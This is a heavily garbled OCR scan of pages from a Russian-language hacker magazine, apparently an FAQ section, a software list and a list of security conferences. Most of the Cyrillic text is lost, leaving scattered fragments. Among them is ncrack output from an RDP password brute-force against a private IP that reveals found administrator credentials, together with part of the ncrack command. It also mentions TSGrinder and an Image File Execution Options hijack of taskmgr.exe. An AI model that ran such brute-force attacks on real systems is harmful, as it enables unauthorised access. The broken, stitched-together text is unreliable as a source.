fakedns.py (bit.ly/vhgamQ).

DNS-

Malcode

Python !

40 !

IJ

HostsMan (bit.ly/uZAVOX).

DNS-,

Analysis Pack. ApateDNS,

DNS-

' . I

hosts.

, ,

I- . !

fakedns.py,

. , , 99%


UNITS/ FAQ UNITED


r,1

1:'.1

n . n

. ,

CTRL + SHIFT +

, n

ESC?

Medium [
). , n

Process Explorer
(bit.ly/ugFDpx) n Replace
Task Manager, n

181

High.

Low, Media

192.168.26.137:3389,CL=2
rdp://192.168.26.137:3389 (EID 1) Login failed: 'administrator' 'admin'

n , -n

Discovered credentials
rdp://192.168.26.137:3389 'administrator' 'admin123'

. n

Process

(View -> Select
Columns -> Integrity Level). n

r.1
1:'.1

n n ,

- ? n,

nn :

- n ,

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe

taskmgr.exe

usermode.

, n, n,

KeePass

n n ,

KeePass

netsh n

netsh interface dump > netsh-config1.txt

- .

[n,

: \u ti 1s\Process 1 \ . ) .

High,

KeyPass

n. l

dump:

r.1
1:'.1

1'.8

. n
. - ,

nn n n

NETSETMAN (WWW.NETSETMAN.COM)?

181

,
, .

Debugger

n
:

n [

KeyPass) n

- n

# ----------------------------------
# Interface IP Configuration
# ----------------------------------
pushd interface ip

# Interface IP Configuration for "Local Area Connection 1"

set address name="Local Area Connection 1" source=dhcp
set dns name="Local Area Connection 1" source=dhcp register=PRIMARY
set wins name="Local Area Connection 1" source=dhcp
popd
# End of interface IP configuration

WEBSOCKET?

n ,

n,

. ,

181

1.

n -

2.

, ,

n .

n ,

, -Wireshark

Run as administrator.

Windows Integrity Levels

n .

[www.wireshark.org ).

n n

n WebSockets,

icacls,

n,

n [n,

SOAP).

n Firefox
- Tamper Data (bit.ly/sM49Hk),

Chml (bit.ly/sOBLCm). n,
"-i:h") n n
"-nr"):

n ,
n

nn~

netsh -1:

chml file.zip -i:h -nr

netsh -f netsh-config1.txt

r.1
1:'.1

WINDOWS INTEGRITY LEVELS?

file.zip
Access is denied.

, n,

. :::

Windows Vista, 7
Server 2008,
, - mandatory integrity levels (MIL).

181

n,

RDP ?

n ,

181 n

RDP-, TSGrinder (bit.ly/uThpnS).

n , n,

Microsoft

n -n

n n

, n.

n nn

. n

RD

n n

. n :

ncrack (nmap.org/ncrack) nmap ,

n ,

138

,
n ,

$ ncrack -vv -d7 --user administrator \
-P /home/user/passlist.txt \

FakeDNS DNS . .

A~ache

CIAT 1.02
ClamAV 0.97.3
DirBuste 0.12

AutoHideDeskto~lcons

All Free 150 Burner


Avidemux 2.5.5
AV5 Media Pla ~e r 4.1.8.93
ExifTool8.71

~roximity

>Deskto~

~~

IP 5canner 3.0 Beta 6


3.1.3.1

lncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioCiicker 8.11

Free[!roxy 4.10

Cli~Gab

Cheese 3.2.2
Clementine 0.7.1
Coolreade 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnu~lot 4.4.4
Handbrake 0.9.5
lmageagick 6.7.3-8
K9coov 2.3.7

1.2.5

IDclassifv 1.1

GenXE 0.9.0
Go l15MERO
Gsasl1.6.1
HOPPE R

Gadmin-openvpn-server 0.1.5

Fwbuilder 5.0.0.3568

Emulation Framework 1.0.0

>Securit~

Chatsniff 1.0
Clamtk 4.36

UNIX

>Net

5~stem ~l

3.6.2
WhoCrashed 3.02
Mouse Button Control 2.0

5ongird

Svchost Process Anal:tzer

Perestroika 4.0.0
Real em~ 3.60
5mart Delrag 2.2

Nimi Visuals

Aweather 0.6
Chrome 15
Dada mail 4.8.4
Evolution 3.2.2
Fiefox 8.0.1
Getleft 1.2
lnstantird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lft~ 4.3.3
Liferea 1.6.6
Lin~hone 3.4.3
Linuxdc2P..llQ.
5muxi 0.8
5tealthnet 0.8.7.9
5wift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1

1.10.1
5TDU Viewer 1.6.62
?.9 lmage Viewer 1.3
Ubuntu 5kin Pack 8.0
WindowTabs

Sonarca Sound Recorder 3.7.8

Free Screen Video Recorder


2.5.19
Jim 2.0.0
i 3.0.0.1442
Man~Cam 2.6.60
Photosca~e 3.5

Free Audio Converter 5.0.2

DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
Tune 5.0
HDCione 4.0.7
JaBack 9.12

1.41

>S~stem

>Multimedia

Device Remover 0.9

>Net

WP5can 1.1
X-5can 3.3

0.9.1 7

E!_i~ear2.4.0

Netrek 3.3.0

5umataPDF

>Games

Nant 0.91
Open64 5.0
Padre 0.92
~ 1.7
Quexml 1.3. 7
.,t2 2.0.5
Ruby 1. 9.3-pQ
'@!grind 3.7.0

M aveyUo_3.0

Libmicrohtt~d

~lass2.0.0

Gtk 3.3.4
Javatools 0.44
Jvcl 3.45

~__l_

Window Maximizer v2.00


Windows-privesc-check

NMa~5i4 0.3 beta


PEiD Plugins
Rec 5tudio 4
thc-ssl-dos 1.4
U58 ~ 1.0
VanishCy t
VirtuaiKD 2.6
w3af 1.1
Windbgshark 0.0.1

NetworkMiner 1.2

GenXE 0.9.0
Hades
John the Ri~~er 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1

Emulation Framework 1.0.0


File Disclosure Browser

BeEF 0.4.2.11

. 9

tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21

>Devel

Buster Sandbox Anal:tzer 1.44

>Securit:t
Ariadne

Virtual Router

TweetMyPC 3.9
VideoCacheView 2.02

Terminals 2

Libreoffice 3.4.4
Metamo~hose 1.1.2
Ni~2 7.26.3
~
P~room 0.4.1
Tomboy__11]_
Wavesurfer 1.8.8~3
Xine 1.1.20
Xorriso 1.1.8

5k~~ Voice Changer 1.0


5mart5niff 1.91

RocketDock 1.35
1.9
UboroBot 2.0
ViewFD 2.3.0
Votumouse 1.72
Win5~1it Revolution 11.04

Rainmeter 2.1

7stacks 1.5
Droid ~l 0.8.8.2
EssentiaiPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu ools 6.0.1
FreeCommander 2009.02
Pointer5tick 1.21
Q-Dir 4.87

>Misc

5DL 1.2.14
5t~leCo~ 4.6
TRe~lacer 2.11
Utilu IE Collection 1.7.2.0

~~ter2.4.3

AjaxControiToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook # 5DK 5.3.2
1.4.0
Heidi5QL 6.0
HiAsm 4.4
Json.N ET 4.0
Mocha 0.0.8
PHPExcel1.7.6
V5 1.1

>Develo~ment

WINDOWS

12.1

WinamD 0.7.1

DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widqet 2.1 .1
JollysFastVNC 1.32
Mag ican 0.9.63
Mou 0.7.0
RaidEve 2.0
5ource 1.2. 9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1

Clementine Music Player

Amava 11.3.1
,t;p~ Hack 1.1
Aotana 5tudio 3.0
Art of lllusion 2.9
1.2

Q~en5U5 E

>X-distr

0.8.6
Css20111030
Di 4.31
Freei~a 2.1.3
Glpi 0.80.5
Greo 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pis 6.1.0.8729
Pl-kernel 3.1.3
~~nctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabix 1.8.9

A~t-dater

>System

Postg~!.i.lJ

Aoache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1 - ~ 1
Cu~s 1.5.0
DhcQill
Dovecot 2.0.16
Freeradius 2.1.12
1!ghtt~d 1.4.29
"11291 5.5.18
Nsdi2.9
Openldap 2.4.27
Openvpn 2.2.1
Postlix 2.8.7

>Server

~wi re 2.4.2.2
w3a-f-1.-1- -

~swan4.6. 1

. 7.1

John the Ri"'~~'-'e'-r-"1."-7."-9_ _ __


Naxsi 0.41
Nmap5i
Vulneraility Hunter 1.1.4.6
Rec 5tudio 4
Revelation 0.4.12
sqlsus . 7.1


UNITS/WWW2

www.routerpwn.com

, n

. , mac_find [
-l phenoelit [
l. -
, . ,
, ,

IP- . ,

:1.

kicksend.com
,

Rapidshare , n
. -
, n

e-mail

. , ,
, , n: <<

e-mail

1 .

500

? , ,

- .

proXPN

proxpn.com

, N,- n-lik-
VPN server . ,

OpenVPN,

, . ,
N . , . ,

. [
, WiFi-xocoyl,
.

..

VN-

jpc2.com

<< >>.

Javascript Emulator (bellard.org/jslinux),


[ JavaScript), Linux.

JPC 2

, ,

jpc2.com,

Windows

Ubuntu-

Java

, .

Windows Ubuntu

UNITS 1GEEK ART

CODE

UNITS/ 2012

I I

NY2K+12

- ,

. USS

MUSTVISIT ,

20-23

: . -

14-16

30-31

2012

.d
Hack
Days

HITB

BLACKHAT

PHDAYS

conference.hitb.org

www.blackhat.com

CONFIDENCE

www.phdays.ru

PH DAYS

confidence.org.pl

, ,

. -

, -

, ,

. ,

26-29

F-.

25-26

2012

:1.

DEFCON RUSSIA

u
OCG *

7812

DEFCON

'2012

www.defcon.org

cc.org.ru

www.zeronights.ru

, 20-

dmsn- .

- .

: -

. -

ZERONIGHTS

DEFCON
RUSSIA

www.defcon-russia.ru

2011

, -

I/ -,

. -

'

'

'


I
*

OT&OPHbiE

, n .

, , n

TASH

.
3 .